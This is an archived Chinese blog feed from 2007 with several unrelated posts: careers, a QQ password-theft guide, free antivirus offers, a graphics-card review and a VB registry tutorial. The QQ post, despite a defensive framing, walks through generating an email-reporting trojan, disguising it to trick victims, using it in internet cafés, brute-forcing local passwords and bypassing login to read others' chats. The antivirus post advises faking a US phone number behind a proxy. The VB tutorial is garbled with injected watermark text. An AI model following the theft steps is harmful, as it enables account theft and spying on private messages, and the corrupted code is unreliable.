<![CDATA[鹤岗平价电脑装机]]> http://hi.baidu.com http://hi.baidu.com http://img.baidu.com/img/logo-hi.gif http://hi.baidu.com/52138881 zh-cn www.baidu.com 5 <![CDATA[未来十大热门高薪职业]]>
未来十大热门高薪职业
http://post.baidu.com/f?kz=102763063
未来的十大热门专业全纵览 http://post.baidu.com/f?kz=101301981
中国十大最有潜力的职业 http://zhidao.baidu.com/question/9090316.html

参考资料:http://www.tlstudio.net
类别:默认分类 查看评论]]> 2007-07-04 11:57 http://hi.baidu.com/52138881/blog/item/e0d7cf35333fda1391ef39fe.html <![CDATA[盗取QQ密码之不完全攻略]]> 随着网络的普及,如今很多朋友最重要的交流方式都是QQ,但是QQ安全是一个大家都非常关心的话题,盗取QQ号的工具也是层出不穷,随着近年来大家安全意识的提高,大家对QQ安全有了一定的重视,但是所谓黑客借助一些工具盗取QQ号同样是非常容易的事,下面就来看看黑客是如何利用工具软件结合邮箱轻松盗取他人的QQ号码的,以便我们更加有效地防范!

  一、QQ密码发送者  

  该软件使用比较简单,你需要具有一定的“欺骗”能力,要想成功,最关键的在于如何想方设法让对方接收并运行你的木马,然后你就可以“坐收渔利”了!
下载并解压该软件,运行其中的可执行文件,运行窗口如图1。

 在此窗口中,你只要输入一个有效的邮箱,然后点击“生成QQ木马”按钮即可生成一个木马,如图2。  

 接下来就是把该木马发送给对方,要能让对方运行,你需要将改木马改名,比如改名为“我的FLASH”、“XX软件”等,只要能让对方信任你并点击运行该木马即可!

  一旦对方运行了该软件,并再次登陆QQ,那么对方的QQ号码、密码以及对方机器IP等信息都会通过邮件发送到你设置好的邮箱,你就等着查看自己的“战功”吧,如图3。  

 提示:

  该软件非常适合在网吧内使用,只要你在别的机器上配置好该软件,然后换一台机器上网,一旦别人用那台机器登陆QQ,当然是把他的QQ拱手相送了!  
  二、无敌QQ密码盗取器  

  该软件是一个后台监控类的盗取QQ的软件,同样需要邮箱配合使用,具体设置比较简单。

  运行该软件,配置窗口如图4。  


 在该窗口中,你需要设置好的所使用邮箱的SMTP服务器地址及用户名和密码,为了保证信件能正常接收,设置完毕后最好点击“测试”按钮进行测试。

  提示:

  邮件标题不填则将以QQ号码为标题,另外,最好把“发送多少个号码”设置小点,这个功能很有用,一旦程序发送邮件的数目达到了这个数的时候就不再发送了,否则可能导致你的信箱被撑破。  

 三、用QQ破密使者盗取QQ

  QQ破密使者是一个本地破解QQ密码的黑客工具,你可以选择字典暴力破解本地QQ密码,速度极快,并可自己设定延迟时间,下面看看具体的使用方法。  

  下载该软件并解压,其中“QQPW_Crack8”是安装程序,里面还有一个“破解字典”文件夹(图5),这是破解QQ密码所要用到的字典文件,里面有4个字典文件,当然你也可以自己制作一个字典工自己使用。安装完该软件后,就可以实践一下该软件的威力了!  


  首先运行该软件,软件主界面如图6所示。  

  首先你需要配置“QQ路径”,点击“浏览”按钮找到QQ的主程序,“QQ号码”一栏中自动会显示用本机登陆的QQ号码,你只要选择其中一个即可,然后需要设置“字典路径”,点击后面的“浏览”按钮,找到字典文件所在位置,比如C:\WINDOWS\Desktop\新建文件夹\QQ破密使者\破解字典\dictionary1.txt,如图7。  

  设置好字典文件后,你还可以设置延迟时间,然后你就可以点击“开始破解”进行破解了!该软件会用字典文件中的密码一一尝试,破解过程如图8。    

 提示:破解速度跟你的电脑速度有关,在破解过程中不要打开别的什么程序以免影响破解速度!这种方法非常适合于在网吧盗取别人的QQ号!  
  四、轻松偷窥QQ2004聊天记录  

  随着QQ2004Beta的推出,广大“Q友”们又一次体验了新版本带给大家的惊喜,那么QQ2004Beta在安全性方面又怎么样呢?针对QQ2004Beta 推出的“QQ2004Beta免密码登陆器”也许同样会带给你一个“惊喜”!

  使用“QQ2004Beta免密码登陆器”后,输入任意密码即可登陆QQ,这样你就可以偷窥他人的好友资料及聊天记录啦!注意该软件只适用于最新版本的QQ2004Beta。

  下载并解压该软件后,必须将其中的“cr-QQ2004Beta(7.13).exe”拷贝到你的QQ2004Beta安装目录,通常为“C:\Program Files\Tencent\qq”,否则直接运行该软件会出现找不到QQ.exe文件的提示!

  运行QQ2004Beta安装目录下的“cr-QQ2004Beta(7.13).exe”文件,弹出窗口如图9所示。

 点击“确定”按钮后弹出QQ正常的登陆界面,如图10。  

  这里你随便输入一个密码,然后点击“登录”即可登陆,但这时会弹出一个“请再次输入登录密码”的提示框,不要管它,但是千万不要点击“取消”,否则就QQ就自动关闭了,如图11。  

  这时QQ就离线登陆了,你可以查看他人的好友资料及聊天记录。需要注意的是:这样登陆的QQ聊天窗口是不能打开的,所以要查看聊天记录和好友资料,必须依次点击“菜单”→“好友与资料”→“消息管理器”才行,或者你在QQ主界面上用鼠标右击某个好友,然后选择“聊天记录”或者“查看资料”选项。


类别:默认分类 查看评论]]> 2007-06-27 16:04 http://hi.baidu.com/52138881/blog/item/85e4b219f7731078dbb4bd47.html <![CDATA[免费正版安全软件集合——穷人必读之杀毒软件篇。]]> 安全软件集合——穷人必读之杀毒软件篇。

如今的互联网,陷阱处处,危机四伏,病毒木马、流氓软件、菜鸟黑客,为祸甚深,稍不留神就会中招——系统瘫痪帐号被盗欲哭无泪。防范于未然,未雨绸缪,这是明智之选,所以我们需要安全软件,比如杀毒软件、防火墙、hips、反间谍软件,同时还要打好系统补丁,提高警惕,养成良好的上网习惯。杀毒软件是的重要工具,所以我们最好是用正版,但是正版是需要花钱的——我可怜的白花花的银子啊!难道正版一定要花钱吗?不一定,正版也有很多免费的,而且能力绝对不在我们花钱买的X星、XX毒霸之下。下面我就把自己收集的免费正版杀毒软件的使用方法和下载地址提供出来,供囊中羞涩的朋友选用,富人可以路过。

1.玉树临风麦咖啡:McAfee VirusScan 10.0.27 简体版
系统支持:[url=]Win2003/Winvista/WinXP/Win[/url]
软件大小:10.22MB
软件语言:简体中文

软件授权:免费
软件简介:McAfee防毒软件, 除了操作介面更新外,也将该公司的WebScanX功能合在一起,增加了许多新功能! 除了帮你侦测和清除病毒,它还有VShield自动监视系统,会常驻在System Tray,当你从磁盘、网络上、E-mail夹文件中开启文件时便会自动侦测文件的安全性,若文件内含病毒,便会立即警告,并作适当的处理,而且支持鼠标右键的快速选单功能,并可使用密码将个人的设定锁住让别人无法乱改你的设定。
使用方法:安装之后使用电子邮箱注册一下,软件版本直接更新到10.0.28,可以使用1年。安装之后有注册提示,按照提示一步一步进行就可以了。
下载地址:网络安全http://download.zol.com.cn/link/11/104760.shtml

2.神秘杀手AVAST!:avast! Home Edition 4.7.936 简体中文版
软件大小:12642KB
软件语言:简体中文
软件类别:国外软件/免费版/杀毒软件
运行环境:Win9x/Me/NT/2000/XP/2003
软件简介:avast! Home Edition是一款免费的防毒软件,但功能上可是一点也不逊色,它拥有着一个近几100%的完全防护功能,不论是文件、电子邮件,甚至是P2P以及IM软件,均在它的防护之下,它的网络防护功能,就如同一个轻量级的防火墙,让我们不论是计算机系统安全或是网络安全,都受到它严密的保护。和专业版相比,少了两个可有可无的功能,无所谓。来自捷克,在欧洲很响亮的杀毒软件,号称唯一可以和NOD32抗衡的软件。
使用方法:安装之后是两个月试用版,按照提示使用电子邮箱注册一下,可以使用14个月。升级之后版本变成4.7.942。
下载地址:http://www.newhua.com/soft/48465.htm

3.能力超强小红伞:Avira AntiVir PersonalEdition Classic7.0
软件大小:13M
软件语言:英语
软件类别:国外软件/免费版/杀毒软件
运行环境:Windows NT / 2000 / XP
软件简介:来自德国的小红伞,这个是免费的C版,对于小红伞,我不想多说什么,各大论坛都有很好的口碑,我的评价只有一个字——强!这个东西只有英文版,由于内核保护问题,不能汉化,建议有一定英语基础的朋友使用。
使用方法:安装就可以用,注意设置,需要开启启发扫描功能。
下载地址:http://www.free-av.com/down/windows/antivir_workstation_win7u_en_h.exe
                http://www.free-av.com/


4.免费先锋:ClamWin Free Antivirus v0.90
软件大小:5.56M
软件语言:英语
软件类别:国外软件/免费版/杀毒软件
运行环境:Win9x/Me/NT/2000/XP/2003
软件简介:ClamWin是一套功能非常优秀的免费防毒软件。它的体积非常娇小,不会占用太多计算机资源,不像其它防毒软件安装之后会拖累整台计算机的速度。而且除了强大的文件与电子邮件防护能力之外,它还拥有排程扫描、在线更新病毒码、及时侦测等功能,和市面上知名防毒软件比起来一点也不逊色!
使用方法:安装就可以用了。建议英语好的朋友使用。
官方网站:http://www.clamwin.com/
下载页面:http://www.clamwin.com/content/view/18/46/

5.性能强大AVG:AVG Anti-Virus 7.5 Build 447a967
软件大小:未知
软件语言:英语
软件类别:国外软件/免费版/杀毒软件
运行环境:Win9x/Me/NT/2000/XP/2003
软件简介:AVG Anti-Virus System 功能上相当完整,可即时对任何存取文件侦测,防止电脑病毒感染;可对电子邮件和附加文件进行扫瞄,防止电脑病毒透过电子邮件和附加文件传播;『病毒资料库』里面则记录了一些电脑病毒的特性和发作日期等相关资讯;『开机保护』可在电脑开机时侦测开机型病毒,防止开机型病毒感染.在扫毒方面,可扫瞄磁碟片、硬盘、光盘机外,也可对网络磁碟进行扫瞄.在扫瞄时也可只对磁碟片、硬盘、光盘机上的某个目录进行扫瞄.可扫瞄文件型病毒、巨集病毒、压缩文件(支持 ZIP,ARJ,RAR等压缩文件即时解压缩扫描).在扫瞄时如发现文件感染病毒时会将感染病毒的文件隔离至AVG Virus VauIt,待扫瞄完成后在一并解毒.
使用方法:安装之前先去http://www.grisoft.com/html/webreg.cfm 填个表,从回信中得到一个序列号。
下载地址: http://www.grisoft.com
下载AVG Anti-Virus 7.5 Build 447a967
http://download.grisoft.cz/softw/70/filedir/inst/avg75f_447a967.exe

下载AVG Anti-Virus with Firewall 7.5 Build 447a967
http://download.grisoft.cz/softw/70/filedir/inst/avg75afwt_447a967.exe


6.精简版本卡巴斯基:Active Virus Shield 6.0.308  
软件大小:13900 K
软件语言:简体中文
软件类别:国外软件/免费版/杀毒软件
运行环境:Win9x/Me/NT/2000/XP/2003
软件简介:美国在线AOL周一推出了一款免费的杀毒软件,更令人激动的是,这款软件实际上是由俄罗斯安全软件专家卡巴斯基为其编写的。软件包含了实时监控,邮件扫描,每小时自动更新等功能。除了基本的扫描防护和自动更新外,软件还有许多新的特性,如可在系统繁忙时让出资源,避免减慢系统速度等。该安全软件还为迅驰笔记本电脑及超线程技术做了优化,支持64位Windows操作系统。
使用方法:到这里申请一个序列号就可以使用1年。精简了部分功能的卡巴斯基。http://www.activevirusshield.com/antivirus/freeav/get_started.adp
下载地址:http://dl.pconline.com.cn/html_2/1/66/id=39050&pn=0.html
汉化补丁:http://www.hanzify.org/没办法,原地址不能正确显示,进去找吧。


7.老牌杀毒诺顿:Symantec Antivirus V10.1.4.4000 简体中文企业版
软件大小: 28.05MB
软件语言: 简体中文
软件类别: 国外软件 / 病毒防治
应用平台: Win2003/WinXP/Win2000/Win9X
软件简介:Symantec AntiVirus Corporate (诺顿杀毒软件企业版本)是世界上最优秀的杀毒软件之一,这个是企业版本,和专业版本、标准版本相比能为你带来更低的系统资源占用,更可靠的性能!希望大家喜欢! 为企业范围内的工作站和网路服务器提供全面的病毒防护-全球唯一病毒码更新的速度远快于病毒散播的速度的病毒防护方案 (台湾地区简称-赛门铁克企业防毒组合B-包含工作站及伺服主机的多层次防毒便利授权与中央控管的机制) 随着传播性、破坏性强的病毒出现得越来越多,企业范围内的病毒防护需求已经变为一项重要核心业务需求。仅仅在防火墙和电子邮件闸道具有安全性还不能够实现病毒全面防护。工作站以及网路服务器层级的全面病毒防护是确保系统正常运行和用户生产率的重要需求。本来还有更新的10.1.5.500简体版,考虑没有安全下载链接,省去。
下载地址:http://www.duote.com/soft/3063.html

8.貌似国产熊猫卫士:Panda Internet Security 2007 v11.00.02(熊猫卫士互联网装2007)
软件大小: 28.79 MB
软件语言: 不明
软件类别: 国外软件 / 病毒防治
应用平台: Win2003/WinXP/Win2000/Win9X
软件简介:熊猫卫士是Panda 软件公司在中国推出的反病毒产品。 Panda软件公司是欧洲第一位的计算机安全产品公司,也是唯一最大的杀病毒软件公司内拥有100%自有技术,且足以同美国相抗衡的公司,同时Panda也是世界上在该领域成长最快的公司。 如今Panda Software公司的业务领域已经拓展到美国、中国、丹麦、德国、法国、阿根廷、巴西、保加利亚、塞普路斯、立陶宛、拉脱维亚、新加坡、南非、日本、加拿大、及印度等32个国家和地区。迄今, Panda Software进军的每一个国家都取得了业务的成功,在所有进入的市场均取得了成功,在欧洲及世界范围内享有卓越的声誉。

Panda软件公司拥有欧洲最强大的技术开发力量,在欧洲的开发中心有150位开发人员日夜不停地开发最先进的反病毒技术,同时Panda公司在全球与业界的知名公司机构如Microsoft、ICSA的合作使Panda公司的产品在底层与主流平台紧密结合,同时Panda公司是世界上率先提出365天24小时客户技术支持的反病毒公司,现在该项服务业已成为业界的潮流,而Panda公司的24小时紧急新病毒查杀服务在1998年度全球达到98%的成功率,Panda公司拥有庞大的病毒特征库,多达50,000 种。

熊猫卫士获得的奖项及证书 Panda软件公司的产品在世界各地有超过2,000,000用户,其中典型的用户包括:百事、3M、奔驰、爱立信、NEC、松下、西门子、柯达、DHL、波音公司等。Panda公司的产品是世界上唯一同时被世界最权威的杀病毒检测机构ICSA及Checkmark认证的基于Win95/98、Win3.1X、Win NT工作站、Dos、OS/2、NovelNetware、Win NT、MS Exchange 服务器及客户机的多平台反病毒产品,Panda软件多次获得最权威的PC Magazine杂志评选的最佳编辑选择奖,并在PC Magazin杂志199x多年度在被评测的杀病毒软件中名列第一。
使用方法:本来是收费的杀软,但是在美国有免费的送号活动,我们可以借来用用,是送1年的序列号。以下是免费注册地址,注册后即可收到激活码,上网激活后可免费用一年,与正版一摸一样。http://www.pandasecurity.com/promotions/itathome/register.aspx
至于他显示必须美国用户才能注册,因为是美国的一家科技公司赞助的,没别的意思。
去以下代理即可
http://server.cemsg.com/
国内很多邮箱不能注册,我用雅虎的和谷歌的都可以,有人说搜狐也行,我试验没有成功。电话号码一定要填美国的,格式如下:626-258-6523    后面的有XXXXX的自己随便填。
下载地址:http://www.crsky.com/soft/8710.html
                   http://down1.tech.sina.com.cn/do ... 5-09-20/12576.shtml

9.强横霸道卡巴斯基:卡巴斯基杀毒软件单机版6.0
这个软件不用我多说了,地球人都知道的东西,杀毒能力世界第一,基本上所有的杀毒软件吹嘘自己的杀毒能力的时候都喜欢拿卡巴作为参照物,是所有杀毒软件准备超越的目标和梦想。本来是要花钱的,安装一个360安全卫士可以得到半年正版注册码,稍微动动手脚可以得到两个,能用一年。使用方法当然是下载360安全卫士豪华版,安装的时候把卡巴斯基一起安装,然后就可以得到激活码,就这么简单。华军软件园、太平洋、天空下载和360官方网站都可以下载,不知道网址就百度一下。

10.潇洒凌厉NOD32:NOD32杀毒软件
NOD32在全球共获得超过100多个奖项,包括Virus Bulletin, PC Magazine, ICSA认证, Checkmark认证等, 更加是全球唯一通过42次VB100%测试的防毒软件,高据众产品之榜首!
注意:请于安装后立刻更新您的病毒库以保障您的电脑获得最好的保护!
注意:若您的电脑装有NOD32试用版,您必须在安装商业版之前将试用版卸装并重新启动电脑!
现在官方赠送正版序列号,可以用三个月。http://www.nod32club.com/free.shtml
注意:得到ID之后先进行注册,得到用户名和密码,安装的时候用,切记,不然可能出问题。
软件下载:NOD32 简体版2.51  http://www.nod32cn.com/download/download.php#sc
                 NOD32简体版2.70   http://download2.eset.com/download/win/v2st/ndntchst.exe

                
特别说明:所有杀毒软件都是比较安全的正规网站和官方网站下载,安全性有保证。可以放心使用。防火墙和反间谍木马软件免费正版正在整理中,稍后奉献。
类别:默认分类 查看评论]]> 2007-06-26 11:03 http://hi.baidu.com/52138881/blog/item/988113826aabf2a00cf4d2b0.html <![CDATA[高清回放实测 GF8400GS轻松胜GF7600GT]]> 虽然PowerDVD V7.3版本正式支持NVIDIA的PureVideo HD功能,但是要发挥其真正的GPU解码能力,目前NVIDIA推荐大家使用Windows vista操作系统,言外之意Windows XP目前无法启动BSP引擎和VP2等新技术

         但是目前绝大部分用户使用的还是Windows XP操作系统,难道为了看高清必须换成还不是主流的“喂死它”系统?答案当然是否定!据目前得到的资料表明,激活PowerDVD V7.3播放器使用BSP引擎和VP2技术是通过显卡驱动实现。也就是说找到一款这样的NVIDIA显卡驱动就能够实现Windows XP下,播放H.264高清CPU零负载的目的。可喜的是,NVIDIA目前已经有Beta版XP驱动放出,这就是165.01版本驱动,下面就是在Windows XP操作系统下使用该款驱动的表现情况。


HDTV篇 GF 8400GS也能拿下GF 7600GT
Geforce 7600GT

         这是使用165.01版本驱动的Geforce 7600GT情况,不出意料Geforce 7600GT在播放H.264高清视频时CPU占用率平均为45%左右,和在Vista下表现情况相似。

HDTV篇 GF 8400GS也能拿下GF 7600GT
Geforce 8600GT

         这是使用使用WHQL版158.22驱动是Geforce 8600GT播放H.264高清视频的表现,与Gefroce 7600GT表现相似。这也从侧面说明在Windows XP下使用最新的WHQL版驱动无法激活BSP引擎和VP2技术。

HDTV篇 GF 8400GS也能拿下GF 7600GT
Geforce 8600GT

         这是使用Beta版165.01 for XP驱动,此时驱动已经激活BSP引擎和VP2技术,CPU视频解码使用率几乎为零。从而真正实现了在Windows XP下轻松看高清的目的,这一切得益于Geforce 8系列产品的技术革新。

●ZOL评测中心观点

         Geforce 8系列的中低端产品在高清播放的能力上,本文对其进行了一个较为详致的测试。通过和上一代Gefroce 7系列主力产品——Geforce 7600GT的对比,无论是Geforce 8600GTS还是新鲜出炉的Geforce 8400GS,都表现出了在高清视频能力上的强劲能力。

         虽然目前NVIDIA官方只发布了Windows Vista下激活BSP和VP2的WHQL版驱动,但是我们有理由相信在不久的将来Windows XP下的WHQL版驱动也会接踵而至,到那时Geforce 8系列产品将会在3D游戏、2D高清等多领域大获全胜。
类别:默认分类 查看评论]]> 2007-06-25 09:40 http://hi.baidu.com/52138881/blog/item/943ecdd6a4f9802d06088b5a.html <![CDATA[VB修改注册表]]> 编程高*当然需要掌握读写注册表这一技术。用好注册表将会为您的应用程序增色不少,下面笔者将具体介绍VB中与注册表有关的编程方法。 黑客X档案官方站 ['l)|:s7L J6o
注册表的组织结构
R s#| f I K R0存取注册表以前, 必须先了解注册表的组织结构, 而了解注册表的组织结构最简单的方法便是启动 Windows 提供的“注册表编辑器”, 启动的方法是单击“开始”菜单的“运行”命令,输入 RegEdit 之后确定,可看到“注册表编辑器”窗口(如图1所示)。 黑客X档案官方站 L.m ~ {$` _+W A
黑客X档案官方站 K:Z j*P d.q
图1 黑客X档案官方站(S {1a3{:L e l ~
● 键(Key) 与子键(Subkey)
r%^ D B.P Q0注册表编辑器的结构与资源管理器很类似, 左边窗口的每一个文件夹图标表示一个键,就像文件夹下还有子文件夹一样, 注册表的键下也有子键。为了完整地表示某一个子键,习惯上是采用文件夹的路径表示法。 举例来说, HKEY_LOCAL_MACHINE 之下的“Software”子键表示成 HKEY_LOCAL_ 黑客X档案官方站3b z y!O9a2x2n;J
MACHINE\Software,而“Software”之下的 “Microsoft”子键则表示成 HKEY_LOCAL_
R+S R*d |/S5@7`I0MACHINE\Software\Microsoft(如图2所示)。 黑客X档案官方站 v E8?k L.B
黑客X档案官方站 | p f%i Q+L B6\
图2
!Y2` q Q(A y1g0● 键值()、键名( Name)、数据( Data) 与默认键值(Default ) 黑客X档案官方站 V0e A7J s1Z
当我们在注册表编辑器左边窗口选取某一个键(或子键) 之后, 出现在右边窗口中的是这个键的键值(),键值可分成键名(Name)及数据(Data)两部分。对每一个键而言, 至少都含有一个默认键值(Default ) , 以 “HKEY_CLASSES_ROOT\
+L6V a3A$f0.bmp”子键为例, 其默认键值为 “ACDC_BMP”。 除了默认键值之外, 这个子键还含有名称 (Name)“Content Type”和数据 (Data)“image/bmp”(如图3所示)。
.O.Q&`8J!@0黑客X档案官方站%I F f A l ] \,`
图3
t ]&Jl R3j0VB 自身提供的 黑客X档案官方站B W5x X,?*J:M(}
关于注册表的函数 黑客X档案官方站,? X y3l7f
了解注册表的组织结构之后, 接下来讨论如何存取它。就像我们存取文件时必须指明文件所在文件夹(目录)一样, 存取注册表时, 则必须先指明键。键在注册表编辑器中所看到的是一长串的字符串,例如 “HKEY_LOCAL_MACHINE\SOFTWARE\
Q N { H8i0S0Microsoft\Windows\CurrentVersion”。在 Visual Basic 6.0 内部,已经提供了一个标准的注册位置,以存储创建于VB的应用程序的程序信息:HKEY_CURRENT_USER\Software\VB and VBA Program settings\(为了叙述简单,以下将这一位置简称“标准位置”)。VB 提供了两个语句和两个函数来处理存储在应用程序注册位置的程序设置值:
\ V%D0m B*D&J!p7b U0函数GetSetting(appname, section, key[, default]): 检索注册表设置值。 黑客X档案官方站,w o,z v8W \ M
语句SaveSetting appname,section,key,: 保存或创建注册表设置值。
g+w B~ N o0L4` F8R D0函数GetAllSettings(appname, section): 返回一个包含多项注册表设置值的数组。 黑客X档案官方站8O ~ [-N-R+q6{,c5c
语句DeleteSetting appname, section[, key]: 删除注册表设置值。 黑客X档案官方站2{2T+A$R3YD D K
以上所用参数的说明:
i"X E+XW.} l8B0[ ]: 表示可选项。 黑客X档案官方站.\ JU ?8X
appname:字符串表达式,包含应用程序或工程的名称,是标准位置下的一个子键。 黑客X档案官方站3a*A M.D p h%U B
section:字符串表达式,包含区域名称,是 appname 下的一个子键。 黑客X档案官方站 O L4B F*| m q l
key:字符串表达式,标准位置\appname\ 黑客X档案官方站6B"g O8S _ H T
section子键的键名( Name)。 黑客X档案官方站c a ^!c o9w3] T E
:字符串表达式,标准位置\appname\
3|7ay3j L G ~0section子键对应于键名( Name)的键值()。 黑客X档案官方站0X,l:?6c:\;w `
default:表达式,如果注册表项设置中没有设置值,则返回默认值。如果省略,则 default 取值为长度为零的字符串 (“”)。
Y,@7f P n C A h0GetAllSettings返回Variant,是内容为字符串的二维数组,该二维数组包含指定区域中的所有注册表项设置值及其对应值。 如果 appname 或 section 不存在,则GetAllSettings 返回未初始化的 Variant。 黑客X档案官方站 t W5V j9y y;r7O
实例之一
2Y x+A r3H h v%f a0在 VB6.0中新建一工程并命名为 vbreg.vbp,删去其中所有窗体,在工程资源管理器中点击右键,选择添加模块,并命名为 vbreg.bas。双击reg.bas,输入如下代码:
K2D9r D e0Dim avntSettings As Variant
+_7r b'X r E e E(c0Dim intX As Integer
_ x9I r9P r%d#a D H0avntSettings = GetAllSettings(“VB 6 API 声明加载器”, “File List”)
N;m"] [ P B"@0For intX = 0 To UBound(avntSettings, 1) 黑客X档案官方站 G L1Z U b6Y z
Debug.Print avntSettings(intX, 0), avntSettings(intX, 1)
-\ @*Q z;S9b,l0Next intX
Y"z'g X l {*j r0上面这段程序首先用 GetAllSettings 函数检索“VB 6 API 声明加载器”子键File List部分的两个注册表项的值,并将其结果显示在立即窗口中。开始运行前请按+确保立即窗口显示在屏幕上。同时请打开注册表,以便将标准位置\VB 6 API 声明加载器\File List的键值与结果进行对照。 黑客X档案官方站:t p v8^(C { ^%~
下面这段程序用 SaveSetting 语句在标准位置下建立名为“我的工程\我的子键”的子键,然后使用 GetSetting 函数来得到其中一项设置值并显示出来。因为有传入参数default,GetSetting 函数一定会有返回值。
g w B v c7g m0请注意,区域名称不能用GetSetting 函数取得。最后,使用 DeleteSetting 语句将该子键删除。 黑客X档案官方站-X,`'r z3T&w&^ m c8?/| Z
SaveSetting “我的工程”, “我的子键”, “Top”, 75 黑客X档案官方站 F8J)r t M6u&X t F
SaveSetting “我的工程”, “我的子键”, “Left”, 50
7^ @ G!?7c {'c V0Debug.Print “Top”, GetSetting(“我的工程”, “我的子键”, “Top”, “25”) 黑客X档案官方站 ?*d(l m q
Debug.Print “Left”, GetSetting(“我的工程”, “我的子键”, “Left”, “0”)
T W+\ d ]6X0’为了便于观察,调试可以在此处设置断点,同时切换到注册表,按下键刷新,即可看到自己建立的子键及其键值
N%q V9e:T ?%y:B,G K l+q0DeleteSetting “我的工程”, “我的子键” 黑客X档案官方站 G g%c y:f u
’运行完毕后再次切换到注册表并按下键刷新,观察己建立的子键及其键值是否被删除
_ e D&[ ^'e0说明: 运行本程序前,需先确保启动VB时已自动加载“API文本浏览器”,且在API文本浏览器中的“文件”菜单下有打开过的“文本文件”列表。否则,请先打开“API文本浏览器”,并在“文件”菜单下选择“打开文本文件”,打开至少一个文本文件或数据库。
,j ] C0X9k g ~ o b0Windows API 的注册表编程
X;\ z O D ` Q(V*R(i0VB自身虽提供了四个关于注册表的函数,但是这些函数只能在“HKEY_CURRENT_USER\
8v1K1c2e g k*E U e0Software\VB and VBA ProgramSettings”下读取、删除、修改键值。这对于一般的应用程序利用它们可以达到目的,如果想对其他的非“标准位置”的主键或子键进行访问,该怎么办?此时,必须借助Windows API的帮助。 黑客X档案官方站.E6v N8M g
在Windows内部, 每一个键都会对应到一个 Key Handle(等于一个长整数值,程序中通常以 hKey表示),Windows之所以要以hKey来代表键是为了让注册表的存取更有效率,因为整数的操作效能要优于字符串, 所以我们首先来了解如何取得键的 Key Handle(即hKey)。位于最上层的键,有HKEY_CLASSES_ROOT、HKEY_CURRENT 黑客X档案官方站 R8R/w a ~ P(v
_USER、HKEY_LOCAL_MACHINE等,这些键的hKey值是固定不变的,其值见下表: 黑客X档案官方站 |,x V f"X(X ^6N g!r }
-----------------------
!{ x M A4W%T |0  Key      Key Handle
w ^ \+\ _ d9p ` P0----------------------- 黑客X档案官方站#o)S)| p6g B T
HKEY_CLASSES_ROOT    &H80000000
"^)BC e1} l'k#s0HKEY_CURRENT_CONFIG &H80000005  HKEY_CURRENT_USER &H80000001 黑客X档案官方站 a,w3J B8d L
HKEY_DYN_DATA &H80000006 黑客X档案官方站 p B p3{ U"M
HKEY_LOCAL_MACHINE &H80000002
f \)U U(M1p0HKEY_USERS         &H80000003
%P.q$| q#o0--------------------
:y i c5Z6r8\ ] H0但如果要取得这些键的Subkey Handle,则必须调用RegOpenKey API函数,RegOpenKey含有三个参数,用法如下: 黑客X档案官方站&Z F9lK,Q3n v0^/` \
Private Declare RegOpenKey Lib “advapi32.dll” Alias “RegOpenKeyA” (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
/P&c P-v _ t!D8l$G(L0这里hKey是Key Handle,lpSubkey是子键的字符串,PhkResult是函数返回值,若 RegOpenKey调用成功, 则此参数将传回子键的hKey。 黑客X档案官方站,@-R c9I9V
举例来说,我们想取得HKEY_LOCAL_MA 黑客X档案官方站 b p i$Z j4\ c u M
CHINE之下的“SOFTWARE\Microsoft”子键, 则使用的声明是: 黑客X档案官方站 m2v A0l'X U F k(x9n
Dim ret As Long,hKey As Long 黑客X档案官方站 W1c0W [ a(l M
ret=RegOpenKey(HKEY_LOCAL_ 黑客X档案官方站/g8r s k7t
MACHINE, “SOFTWARE\Microsoft”, hKey) 黑客X档案官方站 { X;j(I h g t!j
If ret = 0 Then 黑客X档案官方站 \;} R;N ~
’ret=0表示成功,hKey的值等于“SOFTWARE 黑客X档案官方站)O-H9]*_&~ m.k,~
\Microsoft”Subkey的Key Handle
{&M zO l l-g'd Z L0End If
7Q&j!~ | a3j f;{0请注意调用注册表API函数(例如以上的 RegOpenKey)之后,若成功将传回0,否则传回非0值,这一点与VB函数的惯例并不相同,请特别注意。 黑客X档案官方站;O ] c/w#I V o
RegOpenKey 的第一个参数 hKey 除了可以指定最上层的Key Handle值(例如 HKEY_CLASSES
O v M4? b ~4Q ~0_ROOT、HKEY_LOCAL_MACHINE等)之外, 也可以是一个 Subkey Handle。如上例, hKey 等于“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft” 的 Subkey Handle, 接着如果我们要取得 “HKEY_
n!Q y Y C(h k O0LOCAL_MACHINE\SOFTWARE\Microsoft\ 黑客X档案官方站 v w2? e W r }+w
Windows\CurrentVersion” 的 Subkey Handle, 则程序如下: 黑客X档案官方站(k e+r/v.G&v:Y B D8V
Dim ret As Long, hKey As Long, hKey2 As Long 黑客X档案官方站 J0j W%R _ } Z @ h9V
ret=RegOpenKey(hKey, “Windows\Current 黑客X档案官方站 @*b ~1n J3Z h:M H
Version”, hKey2) 黑客X档案官方站,m Z } Y&l x5U O e5k/T
’hKey2将等于“HKEY_LOCAL_MAC 黑客X档案官方站p C f z ID c0w
HINE\SOFTWARE\Microsoft”的“Windows\ 黑客X档案官方站 f5N&E0d C8s l$F&F
CurrentVersion”的Subkey Handle 黑客X档案官方站 Z T e"i&}-V
在以上程序中,请注意不要在“Windows\
)e!H v G#Z }2y0CurrentVersion”之前加上“\”,使之成为“\Windows 黑客X档案官方站 M C6L ? r [ _ H*C3g
\CurrentVersion”,这是错误的表示方法。
C5T Y5{1w ^ ?$@ | s ~0下面简单地介绍一下其他几个API(32位API):
|9` H ?,{ @"O R z Z y&R0● RegSetEx(): 在打开的注册表关键字的值域中存储数据;
%Y4@ T i|'F0● RegCloseKey(): 释放指定的关键字的句柄;
m v n2i ~ D \0● RegQueryEx(): 在注册表中查找与您指定的键值相关的值;
%g*V V-r(H F$b0● RegCreateKeyEx(): 建立并打开指定的关键字,若已存在则打开它; 黑客X档案官方站 r2o y [0` L1D4R"\
● RegEnumKeyEx(): 枚举指定的注册表关键字的子关键字(32位); 黑客X档案官方站\"] A#J p%|9Z0B H
● RegEnum(): 每次调用枚举指定的注册表关键字的值,复制一个带索引的值的名称和数据块; 黑客X档案官方站 c z y f B S"H4`4n
● RegDeletekey(): 删除一个关键字以及它的子关键字;
6F V4m ^ A _~ P o2a0● RegDelete(): 在指定的注册表关键字中删除一个带名字的值。
}*R I ? c D'P2y7l%H0结束语 黑客X档案官方站8X z3d(P n(c/M8v w L v M
通过调用这些API以及VB提供给我们的函数,我们可以轻松实现注册表的任意关键字的读取、查询、建立和删除,详细的用法可查阅“API浏览器”,在这里就不再进行讨论了。

